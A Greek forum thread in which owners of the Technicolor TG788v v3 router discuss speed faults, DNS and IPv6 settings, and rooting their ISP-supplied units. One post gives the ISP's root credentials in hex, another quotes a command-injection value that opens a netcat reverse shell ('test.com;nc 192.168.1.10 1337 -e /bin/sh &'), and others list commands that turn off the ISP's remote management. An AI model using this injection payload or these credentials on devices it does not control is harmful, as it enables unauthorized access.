Προς το περιεχόμενο

Technicolor TG788v v3


koskappas

Προτεινόμενες αναρτήσεις

26 λεπτά πριν, bill2015 είπε

όλα είναι κανονικά 

κανονικές ip 192.168.1. ανάλογα τη κάθε συσκευή

Συγχρονισμός οκ

όλα πράσινα δείχνει ότι δίνει κανονικά υπηρεσίες 

Το πρόβλημα έιναι ασύρματα και ενσύρματα 

Του έκανα reset τπτ δεν δίνει 

Πραγματικά περίεργο, δεν μου περνάει κάτι από το μυαλό...

Στις 15/11/2020 στις 8:25 ΠΜ, Todoras είπε

Ηρθε τεχνικός σπίτι. Μετρήσαμε ταχύτητες στο ισόγειο στο "κουτί" και μετά στο διαμέρισμα. Το παλικάρι πειραξε την πριζα τηλεφωνου. Την απομονωσε μου ειπε και η ταχύτητα εφτασε κατευθειαν στο 100.

Αυτο οσον αφορα την ταχυτητα. 

Σε οτι αφορα τι αποσυνδεσεις..

Οι αποσυνδεσεις λιγοτερες πλεον συνεχίζονταν και το ρουτερ παραηταν ζεστο και αργουσε τραγικα να συγχρονισει. Ο τεχνικος το ειδε και ζητησε αλλαγη προληπτικα. Πραγματικα με το νεο ρουτερ καμια σχεση. Συγχρονησε σε 2 λεπτα αντι για 10+ και δεν εχω πλεον διακοπες.

Μόλις ήρθε ο παλίκαρος, μου εξήγησε ότι κατά 90% φταίει κάποιο θέμα στην καμπίνα.

Δυστυχώς, θα πρέπει να το δουν πρώτα από τη vodafone και μετά να πάει συνδυαστικά το ticket.

Μου είπε ότι μπορεί να ταλαιπωρηθώ καμιά βδομάδα, αλλά πάντα, λέει, βρίσκεται η άκρη.

Μου είπε επίσης, ότι θα μου αλλάξουν και ρουτεράκι προληπτικά, με ένα ΖΤΕ.

Αλλά, άπαξ και διορθωθεί το θέμα, σκέφτομαι να μην το αλλάξω, αν τελικά φταίει η καμπίνα... Είναι καλό εργαλειάκι, ειδικά μπροστά σε κινεζιές όπως τα ΖΤΕ (μου το είπε και ο τεχνικός)

Στις 15/11/2020 στις 8:25 ΠΜ, Todoras είπε

Ηρθε τεχνικός σπίτι. Μετρήσαμε ταχύτητες στο ισόγειο στο "κουτί" και μετά στο διαμέρισμα. Το παλικάρι πειραξε την πριζα τηλεφωνου. Την απομονωσε μου ειπε και η ταχύτητα εφτασε κατευθειαν στο 100.

Αυτο οσον αφορα την ταχυτητα. 

Σε οτι αφορα τι αποσυνδεσεις..

Οι αποσυνδεσεις λιγοτερες πλεον συνεχίζονταν και το ρουτερ παραηταν ζεστο και αργουσε τραγικα να συγχρονισει. Ο τεχνικος το ειδε και ζητησε αλλαγη προληπτικα. Πραγματικα με το νεο ρουτερ καμια σχεση. Συγχρονησε σε 2 λεπτα αντι για 10+ και δεν εχω πλεον διακοπες.

Μόλις ήρθε ο παλίκαρος, μου εξήγησε ότι κατά 90% φταίει κάποιο θέμα στην καμπίνα.

Δυστυχώς, θα πρέπει να το δουν πρώτα από τη vodafone και μετά να πάει συνδυαστικά το ticket.

Μου είπε ότι μπορεί να ταλαιπωρηθώ καμιά βδομάδα, αλλά πάντα, λέει, βρίσκεται η άκρη.

Μου είπε επίσης, ότι θα μου αλλάξουν και ρουτεράκι προληπτικά, με ένα ΖΤΕ.

Αλλά, άπαξ και διορθωθεί το θέμα, σκέφτομαι να μην το αλλάξω, αν τελικά φταίει η καμπίνα... Είναι καλό εργαλειάκι, ειδικά μπροστά σε κινεζιές όπως τα ΖΤΕ (μου το είπε και ο τεχνικός)

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

59 λεπτά πριν, sremelis είπε

 

Μου είπε επίσης, ότι θα μου αλλάξουν και ρουτεράκι προληπτικά, με ένα ΖΤΕ.

Αλλά, άπαξ και διορθωθεί το θέμα, σκέφτομαι να μην το αλλάξω, αν τελικά φταίει η καμπίνα... Είναι καλό εργαλειάκι, ειδικά μπροστά σε κινεζιές όπως τα ΖΤΕ (μου το είπε και ο τεχνικός)

 

Περαστικά.... και υπομονή.......

 

Όλα κινεζιές είναι. Εμένα ένα zyxel μου φέρανε. Ίδιο ακριβώς μενού και specs με το ZTE που δίνουν.

To TG788 έφυγε επιτόπου...... Η διαφορά στην ταχύτητα του web interface μέρα με την νύχτα. Επιπλέον ότι σου φέρουν θα είναι dual band 2.4GHz + 5GHz και ac 1300. 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

1 ώρα πριν, Todoras είπε

Περαστικά.... και υπομονή.......

Όλα κινεζιές είναι. Εμένα ένα zyxel μου φέρανε. Ίδιο ακριβώς μενού και specs με το ZTE που δίνουν.

To TG788 έφυγε επιτόπου...... Η διαφορά στην ταχύτητα του web interface μέρα με την νύχτα. Επιπλέον ότι σου φέρουν θα είναι dual band 2.4GHz + 5GHz και ac 1300. 

Μετά από παράπονο πως όλες μου οι συσκευές είναι ασύρματες και πως δεν γίνεται να πληρώνω 100MBps και να έχω max 30, μου έστειλαν το Zyxel. Το μόνο αρνητικό είναι πως ενώ έχει DNS πεδίο "ανοιχτό", έβαλα δική μου IP και ...δεν είχα τηλεφωνο και σε κάποιες υπηρεσίες γινόταν μπέρδεμα (ένα meraki πχ που συνδέεται πάνω στο router). Ενώ γενικώς internet είχα κανονικά. Τελικά επανέφερα τα DNS settings στην αρχική μορφή και τώρα παίζουν όλα μπόμπα.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

6 λεπτά πριν, mclound είπε

Μετά από παράπονο πως όλες μου οι συσκευές είναι ασύρματες και πως δεν γίνεται να πληρώνω 100MBps και να έχω max 30, μου έστειλαν το Zyxel. Το μόνο αρνητικό είναι πως ενώ έχει DNS πεδίο "ανοιχτό", έβαλα δική μου IP και ...δεν είχα τηλεφωνο και σε κάποιες υπηρεσίες γινόταν μπέρδεμα (ένα meraki πχ που συνδέεται πάνω στο router). Ενώ γενικώς internet είχα κανονικά. Τελικά επανέφερα τα DNS settings στην αρχική μορφή και τώρα παίζουν όλα μπόμπα.

+++++

Nαι ισχύει.....

Και στους DNS servers. Cloudfare DNS servers τους δέχτηκε. Αλλά...... τίποτα....

Έπρεπε να αλλάξω τους DNS servers και στο pc..... 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

1 ώρα πριν, Todoras είπε

+++++

Nαι ισχύει.....

Και στους DNS servers. Cloudfare DNS servers τους δέχτηκε. Αλλά...... τίποτα....

Έπρεπε να αλλάξω τους DNS servers και στο pc..... 

Έχω σετάρει ένα pihole αλλά δυστυχώς δε μπορώ να το "χαρώ" σε όλες τις συσκευές του σπιτιού. Και άντε από τα PC/Mac γίνεται, αλλά από τα κινητά δεν γίνεται να αλλάξω dns ρυθμίσεις... Κλείνω το offtopic :)

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 2 εβδομάδες αργότερα...

Γεια σε ολους.

Χρειάζεται για διαφορους λογους, να συνδέομαι εκτος σπιτιου, στο web interface του ρουτερ.

Ειχα παλιοτερα το TG585 στο οποιο ηταν ανοιχτη η Port 80, επομενως οταν χτυπαγα το domain μου, εμπαινα απροβληματιστα στο interface (usr/psw secure φυσικα).

Το ρουτερ της Wind, δεν μπορει να ανοιξει την πορτα 80 για το interface του.

Υπαρχει καποιος τροπος να συνδεομαι απομακρυσμενα, ωστε αν κατι στραβωσει με καποια συσκευή μου, αν δεν ανοιγει πορτα για καποια απο αυτες, να μπορεσω να το κανω επανεκκίνηση ας πουμε;;

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 3 εβδομάδες αργότερα...

Γειά σας παίδες.

Έχω το συγκεκριμένο ρούτερ και έκανα μια απόπειρα να ενεργοποιήσω το IPv6 από το Local  Network tab όμως ακόμα και μετά από reboot της συσκευής το status μέσα στο 192.168.1.254 λέει IPv6 not assigned και στο Internet Access tab λέει IPv6 Connecting.Υπάρχει κάποιος που να έχει καταφέρει να το ενεργοποιήσει? Wind btw.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 2 μήνες μετά...
Δημοσ. (επεξεργασμένο)

Technicolor TG788v3 Root Password

 

Spoiler


Quote

546563686e69636f6c6f722054473738387633202d20526f6f74204163636573730d0a0d0a557365726e616d653a2057696e645375706572544737383876330d0a50617373776f72643a205447373838763357316e305375507061537377307264

http://string-functions.com/hex-string.aspx

Copy ολο το quote (τα νουμερα) και paste στη σελιδα (λινκ) απο πανω για να δειτε τα στοιχεια (username+pass)

 

 

 

Επεξ/σία από DanielRGr
  • Like 1
  • Thanks 2
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

5 ώρες πριν, DanielRGr είπε

Αν εμπαινες στο κοπο να δεις τα στοιχεια δεν θα χρειαζοταν η ερωτηση σου.

Χωρις κανενα ιχνος ειρωνιας και επειδη με το κολπο που τρεχει μεχρι τωρα, δεν ειχα καταφερει να το ξεκλειδωσω, πραγματικα να 'σαι καλα για το δυνατο ποστακι σου με τα credentials.

Οταν απαντησα λοιπον, ημουν απο κινητο, μπηκα και εκανα κανονικα το convert για να δω περι τινος προκειται.

Παμε τωρα στο παρασυνθημα, καθως ο τροπος σου δεν μου αρεσε ιδιαιτερα.

Οπως ειπα ΜΠΗΚΑ ΣΤΟΝ ΚΟΠΟ χωρις να βρισκομαι συνδεδεμενος στο router, να δω περι τινος προκειται και μου γεννηθηκε η απορια για το αν τα credentials ισχυουν στο 17.1 firmware. Αναφερει κατι τετοιο στο hex που ποσταρες;

Πρεπει να μυρισω τα νυχια μου;

Μηπως στο 17.2  η wind τα αλλαξει;;

 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

On 30/04/2018 at 10:14, spell1977 said:

Μπορείς να το ξεκλειδώσεις με αυτόν τον τρόπο πολύ εύκολα σε 2 λεπτά....

 


http://forum.kitz.co.uk/index.php/topic,20343.msg361981.html?#msg361981

 

OpenWRT φοράει και μπαίνεις με SSH, απλά μετά φρόντισε να κλείσεις το ssh στο wan , γιατί με την sed εντολή την ανοίγει παντού στο /etc/config/dropbear, αν και υπάρχει firewall rule, καλού κακού ..

 


config dropbear 'wan'
        option Interface 'wan'
        option PasswordAuth 'off'
        option RootPasswordAuth 'off'
        option Port '22'
        option IdleTimeout '610'
        option enable '0'
        option RootLogin '0'

και για τα στατιστικά τρέχεις "xdslctl info --show"


root@OpenWrt:~# xdslctl info --show
xdslctl: ADSL driver and PHY status
Status: Showtime
Last Retrain Reason:    0
Last initialization procedure status:   0
Max:    Upstream rate = 6531 Kbps, Downstream rate = 27109 Kbps
Bearer: 0, Upstream rate = 4997 Kbps, Downstream rate = 28771 Kbps

Link Power State:       L0
Mode:                   VDSL2 Annex B
VDSL2 Profile:          Profile 17a
TPS-TC:                 PTM Mode(0x0)
Trellis:                U:ON /D:ON
Line Status:            No Defect
Training Status:        Showtime
                Down            Up
SNR (dB):        8.4             9.5
Attn(dB):        19.5            0.0
Pwr(dBm):        10.1            4.6
...
...

επίσης μετα κλείσε και το cwmp, και άσε την wind να κουρεύεται...


/etc/init.d/cwmpd stop
/etc/init.d/cwmpd  disable
/etc/init.d/cwmpdboot stop
/etc/init.d/cwmpdboot  disable

ή

uci set cwmpd.cwmpd_config.state=0
uci set cwmpd.cwmpd_config.upgradesmanaged=0
uci set cwmpd.cwmpd_config.periodicinform_enable=0
uci set cwmpd.cwmpd_config.acs_pass='0'
uci set cwmpd.cwmpd_config.acs_user='0'
uci set cwmpd.cwmpd_config.acs_url='invalid'
uci set wifi_doctor_agent.config.enabled=0
uci commit

και αν θέλεις να βλέπεις όλες τις ρυθμίσεις στο web άλλαξε το role του admin ή ενός χρήστη που φτιάξεις σε "engineer" στο /etc/config/web

 

 

Ααυτααααα...

 

Screenshot_20180430_102254.png

το δοκιμασα σημερα αυτο . κολλαει στο 1ο βημα . στο " test.com;nc 192.168.1.10 1337 -e /bin/sh &"  μου γραφει μη αποδεκτο domain. η εκδοση μου ειναι η 17.1

δουλευει το exploit ή το patchαραν ? 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

On 12/01/2019 at 12:18, poulinos said:

καπου εγραψα πως τα βλεπεις αλλα ισως ειναι σε αλλο θεμα.στο δικο μου 788v3 που ειναι απο αλλο παροχο ομως μπαινω στο Interface 192.168.1.1 μετα παω στο broadband και παταω το γραναζακι.οταν μπω μεσα μου δειχνει μονο ποσο συγχρονιζω και πρεπει να πατησω στο πανω μερος που λεει show advanced για να μου δειξει και τα υπολοιπα

εμενα σε tg788v v3 απο wind  με root μονο sync rate ειδα . τα υπολοιπα μονο με ssh . 

On 13/01/2019 at 14:28, spell1977 said:

 Το συγκεκριμενο GUI το εχω βαλει manualσε ενα πειραματικο tg788v3, δεν το συνιστω σε κανενα, ασε που δεν παιζουν ολα...

Επισης το curl δουλευει μια χαρα...


root@OpenWrt:~# curl --version
curl 7.52.1 (mips-openwrt-linux-gnu) libcurl/7.52.1 OpenSSL/1.0.2j
Protocols: ftp ftps http https
Features: IPv6 Largefile SSL HTTPS-proxy

για το vlan κοιτα το vconfig αν θελεις να ειναι tagged


root@OpenWrt:~# vconfig
BusyBox v1.23.2 (2017-06-17 05:34:58 UTC) multi-call binary.

Usage: vconfig COMMAND [OPTIONS]

Create and remove virtual ethernet devices

        add             IFACE VLAN_ID
        rem             VLAN_NAME
        set_flag        IFACE 0|1 VLAN_QOS
        set_egress_map  VLAN_NAME SKB_PRIO VLAN_QOS
        set_ingress_map VLAN_NAME SKB_PRIO VLAN_QOS
        set_name_type   NAME_TYPE

root@OpenWrt:~# cat /proc/net/vlan/config
VLAN Dev name    | VLAN ID
Name-Type: VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD
vlan_wan       | 835  | ptm0
vlan_iptv      | 836  | ptm0

 

εγω στο tg788v v3 της wind δεν εχω καν "κανονικο τερματικο linux "  κανω κατι λαθος ? 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 4 εβδομάδες αργότερα...
On 25/02/2021 at 15:37, greek_pilot said:

εμενα σε tg788v v3 απο wind  με root μονο sync rate ειδα . τα υπολοιπα μονο με ssh . 

εγω στο tg788v v3 της wind δεν εχω καν "κανονικο τερματικο linux "  κανω κατι λαθος ? 

εμενα ηταν forthnet.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 3 εβδομάδες αργότερα...
Στις 22/12/2020 στις 3:25 ΠΜ, BaBaN είπε

Γειά σας παίδες.

Έχω το συγκεκριμένο ρούτερ και έκανα μια απόπειρα να ενεργοποιήσω το IPv6 από το Local  Network tab όμως ακόμα και μετά από reboot της συσκευής το status μέσα στο 192.168.1.254 λέει IPv6 not assigned και στο Internet Access tab λέει IPv6 Connecting.Υπάρχει κάποιος που να έχει καταφέρει να το ενεργοποιήσει? Wind btw.

Μήπως βρέθηκε λύση; Προσπαθώ να σεταρω το pi hole και δεν εχω ipv6... 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε για να σχολιάσετε

Πρέπει να είστε μέλος για να αφήσετε σχόλιο

Δημιουργία λογαριασμού

Εγγραφείτε με νέο λογαριασμό στην κοινότητα μας. Είναι πανεύκολο!

Δημιουργία νέου λογαριασμού

Σύνδεση

Έχετε ήδη λογαριασμό; Συνδεθείτε εδώ.

Συνδεθείτε τώρα
  • Δημιουργία νέου...